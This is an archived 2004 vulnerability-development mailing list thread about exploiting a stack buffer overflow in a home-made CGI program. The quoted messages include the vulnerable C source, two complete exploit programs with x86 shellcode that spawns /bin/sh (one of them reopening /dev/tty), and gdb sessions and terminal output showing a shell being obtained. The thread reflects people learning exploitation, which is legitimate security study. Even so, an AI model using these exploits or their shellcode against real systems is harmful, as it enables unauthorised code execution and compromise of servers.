Vulnerability Development mailing list archives
Re: Problem exploiting a CGI overflow
From: sin <sin () innocence-lost net>
Date: Sun, 28 Nov 2004 20:56:44 -0700 (MST)
Firstly, my last post was delayed by several days. Glad you got it working, I didn't realize it was using scanf()/etc, I deleted the first email after I replied (bad habit of mine). As for the last 'funny thing', thats a debugger thing, it detects the execve and is quite normal- actually I've never investigated what exactly it detects, but its the result of the execve. -- There are only two choices in life. You either conform the truth to your desire, or you conform your desire to the truth. Which choice are you making? On Thu, 25 Nov 2004, [iso-8859-1] Víctor Henríquez wrote:
Date: Thu, 25 Nov 2004 14:44:34 +0000 From: "[iso-8859-1] Víctor Henríquez" <vhenriquez () grancanaria com> To: vuln-dev () securityfocus com Subject: Re: Problem exploiting a CGI overflow I have a solution... First, the problem was in scanf() (as said me Rob Seace). Scanf() filter all whithespace characters. Second, I wrote a shellcode without 0x0b,0x0c, but it didnt work because I didnt close and re-open stdin (as suggested Marco Ivaldi). Here is the final exploit: --- cut --- #include <stdlib.h> #include <stdio.h> #define DEFAULT_ADDRESS 0xbffff4d4 #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 520 #define NOP 0x90 char shellcode[] = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80" "\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" " \x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\x04\x06\x04\x05\xcd\x80 "; int main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; FILE *out; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = DEFAULT_ADDRESS + offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; if ((out = fopen("buffer", "w")) == NULL) { perror("fopen"); exit(-1); } fprintf(out, "%s", buff); fclose(out); return 1; } --- cut --- $ cc exploit.c -o exp $ ./exp Using address: 0xbffff4d4 $ ./post.cgi < buffer sh-2.05a$ Thanks for all the posts :) A funny thing... I suppose that is a alignment problem: $ ./exp Using address: 0xbffff4d4 $ cc post2.c -o post $ ./post < buffer Violación de segmento $ cc post2.c -o post.cgi $ ./post.cgi < buffer sh-2.05a$ exit exit More funny: $ cc post2.c -o post $ ./post < buffer Violación de segmento $ gdb post gdb: Symbol `emacs_ctlx_keymap' has different size in shared object, consider re-linking (gdb) r < buffer Starting program: /home/victor/laboratory/gsi/post-dev/post < buffer Program received signal SIGTRAP, Trace/breakpoint trap. 0x40000c00 in object.11 () from /lib/ld-linux.so.2 (gdb) c Continuing. sh-2.05a$ -- Víctor Henríquez Mensaje citado por Víctor Henríquez <vhenriquez () grancanaria com>:Hi, I'm new in this world. I discover several buffer overflow problems in some of our home-made apps. I try to exploit this but I have a rare problem. --- Vuln Code (post2.c) --- #include <stdio.h> #include <string.h> int main() { void split(char *line); char line1[500],line2[500]; strcpy(line2,""); while (!feof(stdin)) { scanf("%s",&line1); strcat(line1," "); strcat(line2,line1); } split(line2); printf("bye\n"); } void split(char *line) { char txt[500]; char *p; strcpy(txt,line); } --- $ cc post2.c -o post.cgi -ggdb $ perl -e 'print "A"x520' | ./post.cgi Violación de segmento (core dumped) $ gdb post.cgi core gdb: Symbol `emacs_ctlx_keymap' has different size in shared object, consider re-linking Core was generated by `./post.cgi'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () Well... I'm trying overflow the strcpy() in split(). --- exploit code --- #include <stdlib.h> #include <stdio.h> #define DEFAULT_ADDRESS 0xbffff4d4 #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 520 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; FILE *out; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = DEFAULT_ADDRESS + offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; if ((out = fopen("buffer", "w")) == NULL) { perror("fopen"); exit(-1); } fprintf(out, "%s", buff); fclose(out); return 1; } --- Now the problem... $ echo "AAA" | ./post.cgi bye $ cc exploit.c -o exp $ ./exp Using address: 0xbffff4d4 $ cat buffer | ./post.cgi Really he execute other code, but not the shellcode. More GDB now... $ gdb post.cgi (gdb) r < buffer Starting program: /home/victor/laboratory/gsi/post-dev/post.cgi < buffer Breakpoint 1, split (line=0xbffff6e0 '\220' <repeats 200 times>...) at post2.c: 21 21 strcpy(txt,line); (gdb) info f Stack level 0, frame at 0xbffff6b8: eip = 0x804859d in split (post2.c:21); saved eip 0x804857f called by frame at 0xbffffac8 source language c. Arglist at 0xbffff6b8, args: line=0xbffff6e0 '\220' <repeats 200 times>... Locals at 0xbffff6b8, Previous frame's sp is 0x0 Saved registers: ebp at 0xbffff6b8, eip at 0xbffff6bc (gdb) x 0xbffff6bc 0xbffff6bc: 0x0804857f (gdb) n 22 } (gdb) x 0xbffff6bc 0xbffff6bc: 0xbffff4d4 // Ret Changed!! (gdb) x/100 0xbffff4d4 0xbffff4d4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4e4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4f4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff504: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff514: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff524: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff534: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff544: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff554: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff564: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff574: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff584: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff594: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff5a4: 0x90909090 0x90909090 0x90909090 0x1feb9090 0xbffff5b4: 0x0876895e 0x4688c031 0x20468907 0xf38920b0 0xbffff5c4: 0x8d084e8d 0x80cd2056 0xd889db31 0xe880cd40 0xbffff5d4: 0xffffffdc 0x6e69622f 0xbf68732f 0xbffff4d4 0xbffff5e4: 0xbffff4d4 0xbffff4d4 0xbffff4d4 0xbffff4d4 0xbffff5f4: 0xbffff4d4 0xbffff4d4 0xbffff4d4 0xbffff4d4 // Shellcode is in position... (gdb) n Program exited normally. What's happen!? I discover that the shellcode change during his execution. Yeah, some bytes of the shellcode change while is running. Why?? How can avoid this? Thanks in advance -- Víctor Henríquez ------------------------------------------------- Este email ha sido enviado a través de http://www.grancanaria.com------------------------------------------------- Este email ha sido enviado a través de http://www.grancanaria.com
Current thread:
- Problem exploiting a CGI overflow Víctor Henríquez (Nov 23)
- Re: Problem exploiting a CGI overflow sin (Nov 23)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 24)
- Re: Problem exploiting a CGI overflow Vlad902 (Nov 27)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 29)
- <Possible follow-ups>
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 28)
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 23)